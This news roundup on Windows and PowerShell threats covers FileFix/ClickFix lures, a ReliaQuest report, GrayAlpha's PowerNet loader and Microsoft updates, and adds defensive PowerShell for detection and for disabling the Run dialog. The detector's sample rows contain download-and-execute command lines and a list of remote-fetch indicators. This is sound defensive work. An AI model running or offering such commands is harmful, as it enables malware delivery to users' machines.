
Latest news with #PowerShell

New FileFix attack brings ClickFix social engineering to Windows File Explorer — how to stay safe

Tom's Guide, 5 days ago

Developed by the cybersecurity researcher mr.d0x, the FileFix attack is a new version of the ever-popular ClickFix social engineering technique. For those unfamiliar with ClickFix, it tricks users into executing malicious commands by convincing them that they need to 'fix' something in order to complete a task on their machines. As reported by BleepingComputer, the new FileFix method uses the Windows File Explorer address bar instead. mr.d0x not only discovered the new method but has demonstrated that it can be used in attacks to target company employees via the same social engineering techniques that have proven highly successful with ClickFix.

ClickFix attacks, which have surged in popularity recently, are browser-based and use a variety of tactics to get victims to click on a button in their browser that copies a command to the Windows clipboard. The victim is then told to paste the command into PowerShell or prompted to perform an additional command in order to 'fix' the issue. This is frequently presented as a reCAPTCHA or an error that needs to be corrected via the Win+R Run dialog. It has proven to be an extremely effective malware delivery tool, used to spread dangerous infostealers and launch ransomware attacks.

The FileFix update created by mr.d0x is similar to a typical ClickFix attack but pastes the command into Windows File Explorer, which many users are more comfortable using. File Explorer can also execute operating system commands, and it is reachable through the browser's file upload feature; the 'trick' portion of the attack is that it no longer requires an error or an issue as a lure and may simply appear as a notification about a shared file that the user needs to locate through File Explorer. FileFix is a phishing page that includes an 'Open File Explorer' button that launches File Explorer through the file upload functionality and copies the PowerShell command to the clipboard. The fake path is what the user initially sees in the File Explorer address bar; it hides the malicious command, which then executes.

The ClickFix tactic, which is being used in more and more attacks, works because it bypasses the best antivirus software and many other security tools. The reason is that victims end up doing most of the heavy lifting themselves: the hackers behind this and similar campaigns use social engineering to coerce them into taking action. They exploit your preexisting knowledge and online habits to get you to do something you otherwise wouldn't, and they may use a sense of urgency to get you to visit one of the malicious sites used in the campaign. If you do see a verification pop-up with instructions, close the website immediately and, whatever you do, don't interact with it or follow its instructions. Being asked to open a Terminal or Command Prompt window on your computer is a major red flag. However, not everyone is as tech savvy, which is why you should share what you've learned with older and younger family members, friends and colleagues to help keep them safe, too.
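As an added defender-side example that is not part of the Tom's Guide article or mr.d0x's research, the PowerShell below scans process-creation records (Sysmon Event ID 1 style fields; the sample rows are constructed) for the parent/child chains these lures produce: a shell or script host spawned directly by a web browser, which the file-upload-dialog path of FileFix makes possible, or spawned from explorer.exe with a command line that fetches remote content, as in the Run-dialog variant of ClickFix. The browser-parent heuristic and the indicator list are assumptions for illustration, not from the article.

```powershell
# Constructed sample of process-creation records (Sysmon Event ID 1 field names).
# Rows 2 and 4 are the kind of chain a ClickFix / FileFix lure produces; rows 1 and 3 are benign.
$sample = @'
ParentImage,Image,CommandLine
C:\Windows\explorer.exe,C:\Windows\System32\notepad.exe,notepad.exe notes.txt
C:\Program Files\Google\Chrome\Application\chrome.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell -w hidden -c iwr http://example.invalid/p | iex
C:\Windows\explorer.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell Get-ChildItem
C:\Windows\explorer.exe,C:\Windows\System32\mshta.exe,mshta http://example.invalid/a.hta
'@

# Assumed lists: browsers whose file dialog could host the pasted command, and the
# script hosts ClickFix-style commands are pasted into. Extend for your environment.
$browsers   = 'chrome.exe', 'msedge.exe', 'firefox.exe', 'brave.exe'
$shells     = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe'
# Command-line fragments that fetch, decode or evaluate remote content.
$remoteHint = 'http://', 'https://', 'iwr ', 'Invoke-WebRequest', 'DownloadString',
              'iex ', 'Invoke-Expression', ' -enc', ' -e '

function Find-ClickFixChains {
    param([string]$Csv)
    $Csv | ConvertFrom-Csv | ForEach-Object {
        # Reduce full image paths to the executable name (works for both path separators).
        $parent = ($_.ParentImage -split '[\\/]')[-1]
        $child  = ($_.Image -split '[\\/]')[-1]
        if ($shells -notcontains $child) { return }   # only care about shell / script-host children

        $fetches = $false
        foreach ($h in $remoteHint) {
            if ($_.CommandLine -like "*$h*") { $fetches = $true; break }
        }

        $reason = if ($browsers -contains $parent) {
            'shell spawned by a browser (FileFix-style file dialog path)'
        } elseif ($parent -eq 'explorer.exe' -and $fetches) {
            'shell spawned from Explorer/Run with a remote-fetch command line'
        }
        if ($reason) {
            [pscustomobject]@{ Parent = $parent; Child = $child; Reason = $reason; CommandLine = $_.CommandLine }
        }
    }
}

Find-ClickFixChains -Csv $sample | Format-Table -AutoSize
```

In production the same function would consume `Get-WinEvent` output from the Sysmon operational log rather than the embedded CSV; the explorer.exe rule deliberately requires a remote-fetch indicator so that ordinary shells launched from the desktop are not flagged.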

ReliaQuest report exposes rise of social engineering cyber threats

Techday NZ, 19-06-2025

ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.

ClickFix and social engineering tactics

One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."

Lateral movement and initial access trends

Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."

Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.

MSHTA on the rise for defence evasion

MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.

Changes in ransomware operations

The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."

Impact on industry sectors

The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.

Malware trends and threat actor activity

The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.

Emergence of Scattered Spider

Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."

Recommendations and defensive measures

ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
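The report's recommendation to disable Windows Run for non-administrative users maps to the Explorer policy value NoRun. As an added example that is not part of the Techday NZ article or the ReliaQuest report, the PowerShell below audits that value in the current user's policy hive and sets it when the Run dialog is still available; it is meant to run in the standard-user profile being hardened, and assumes Windows PowerShell 5.1 or later on Windows.

```powershell
# Explorer policy key; NoRun = 1 removes the Run command from the Start menu and disables Win+R
# for that user. HKCU applies per user; for fleet-wide enforcement use the equivalent Group Policy
# setting (User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu
# from Start Menu) rather than touching registries by hand.
$PolicyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Get-RunDialogState {
    # Returns 'Disabled' when NoRun is 1, otherwise 'Enabled' (value absent or 0).
    $value = (Get-ItemProperty -Path $PolicyKey -Name NoRun -ErrorAction SilentlyContinue).NoRun
    if ($value -eq 1) { 'Disabled' } else { 'Enabled' }
}

function Disable-RunDialog {
    # Creates the policy key if needed and writes NoRun = 1 as REG_DWORD.
    # Explorer picks the value up after the user logs off and back on (or Explorer restarts).
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    New-ItemProperty -Path $PolicyKey -Name NoRun -Value 1 -PropertyType DWord -Force | Out-Null
}

# Audit first, then harden only if the Run dialog is still reachable for this user.
$before = Get-RunDialogState
if ($before -eq 'Enabled') { Disable-RunDialog }
[pscustomobject]@{ User = $env:USERNAME; Before = $before; After = Get-RunDialogState }
```

Because the FileFix variant pastes into the File Explorer address bar rather than the Run dialog, treat this as one layer alongside the web filtering and user training the report also recommends.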

GrayAlpha Weaponises Fake Browser Updates to Drop PowerNet Loader

Arabian Post, 16-06-2025

Security researchers have uncovered a wave of attacks orchestrated by GrayAlpha, a cybercriminal operation linked to the FIN7 group, exploiting cloned browser update pages to install a custom PowerShell loader dubbed PowerNet and ultimately deliver NetSupport RAT malware. Infrastructure analysis confirms the use of fake browser updates, counterfeit 7‑Zip download sites, and a previously unreported Traffic Distribution System called TAG‑124 as delivery mechanisms.

The initial compromise begins when victims visit compromised sites or encounter malvertising and are redirected to fabricated update pages mimicking legitimate services like Google Meet, SAP Concur, LexisNexis and Advanced IP Scanner. Sophisticated JavaScript fingerprinting scripts capture system details before transitioning users to download payloads via URLs such as / These downloads deploy PowerNet—a custom PowerShell loader designed to unpack and execute NetSupport RAT in memory.

Recorded Future's Insikt Group analysis traced overlapping infection paths active since April 2024. While each vector—fake updates, counterfeit 7‑Zip sites, and the TAG‑124 TDS—was employed in tandem, only the bogus 7‑Zip pages remained active by mid‑June 2025, with new domains registered as recently as April 2025. The study also cites 'MaskBat,' a second custom loader resembling FakeBat malware that carries GrayAlpha-specific code strings.

The investigation highlights the group's use of bullet‑proof hosting services, primarily Stark Industries Solutions, with additional infrastructure through HIVELOCITY and HIP‑hosting. These muddy the group's digital footprint while evading takedown attempts. The misuse of the TAG‑124 TDS is particularly notable, marking its first known public disclosure and demonstrating growing sophistication in chaining infection methods. Analysts caution that these tactics emulate FIN7's modus operandi—highly targeted, multi-stage campaigns with advanced tooling.

FIN7 has conducted cybercrime operations since at least 2013, notably targeting the retail, hospitality and finance sectors. It remains structured like a corporate entity, employing specialised teams for malware creation, phishing, money laundering and logistics. In light of these threats, cybersecurity experts recommend stringent application allow‑listing, enhanced employee training to spot deceptive update prompts or malvertising, and deployment of YARA rules and network intelligence indicators capable of identifying PowerNet, MaskBat and NetSupport RAT activity. Organisations are also urged to actively monitor web infrastructure and domain registrations linked to TAG‑124 TDS campaigns.

This campaign underscores a growing trend among financially motivated cyber actors: increasingly professional operations employing deceptive surface-level strategies to deliver heavyweight payloads. While the infection surface varies—browser updates, download portals or redirect chains—the end goal remains consistent: persistence via NetSupport RAT, enabling remote access, surveillance, and data exfiltration.

Microsoft Issues Critical Windows Update—Do Not Delete This

Forbes, 06-06-2025

You have been warned — do not hit delete. You won't like this. If you're at risk from this Windows security vulnerability, the fix is a nightmare unless you're a fairly expert user. That's not ideal, and it's all down to an update quietly installed on your PC without explanation in April.

You may recall the awkward saga of the 'inetpub' folder and 'Microsoft's confusing messaging on deleting or not deleting this mysterious folder on your PC that could leave you and your PC at risk.' Plenty of users deleted the folder that suddenly turned up. 'After installing this update or a later Windows update,' Microsoft later explained, the new folder will appear on your device. 'This folder should not be deleted.' This empty folder, Windows Latest explains, 'is typically associated with Internet Information Services (IIS), which is a native Windows service that allows developers to host websites or apps on Windows 11.' The empty folder appeared without explanation. 'Some of us assumed that it's a bug with the cumulative update and deleted the folder.'

Now we have news of an actual fix. 'If you deleted the 'inetpub' folder, created after Windows April 2025 updates,' Windows Latest warns, 'you need to immediately bring it back.' You can turn on the IIS service or 'use a new PowerShell script.' Only after all those deletions did the explanation come. The 'inetpub' folder 'is created as part of a security patch for CVE-2025-21204,' Windows Latest says, 'and it doesn't matter whether IIS is turned on or not. It'll show up, and you're not supposed to delete it, and if you deleted it, please bring it back, according to Microsoft.' You can turn on IIS, 'however, that's something most people don't want to do because IIS also creates additional folders, which are not required unless you're a developer.' Instead you can run Microsoft's newly released PowerShell script. First ensure you're logged in as an Administrator, then follow Windows Latest's instructions.

Most users are unlikely to go through this, which will leave them at risk. 'As per Microsoft, without the folder and its correct ACLs (Access Control Lists), you remain exposed to potential privilege escalation or unauthorized access.'

Microsoft to Add Lightweight Command-Line Text Editor 'Edit' to Windows 11

Yahoo, 04-06-2025

Microsoft is preparing to bring a new command-line text editor called Edit to Windows 11, made for users who want a simple and lightweight tool for editing text files. Edit is now available on GitHub for anyone to download, and Microsoft says it will soon be included by default in Windows 11 as the primary text editor for command-line environments such as PowerShell and Command Prompt, as reported by Windows Latest. This does not mean Edit will replace Notepad; instead, it will be accessible directly from the Terminal by typing 'edit.' Edit is designed to be an easy and efficient option, with a file size of just a couple of hundred KB. It lets users perform basic text editing tasks, like opening and saving files, finding and replacing, word wrapping, and jumping to specific lines. It's ideal for users who want a minimal tool that works entirely within the Terminal, without the extra functions and size of more complex editors like Notepad or Word. Microsoft says Edit fills a gap for those who need to quickly view or change text files. To use Edit now, users can download it from GitHub or install it through the Winget package manager.
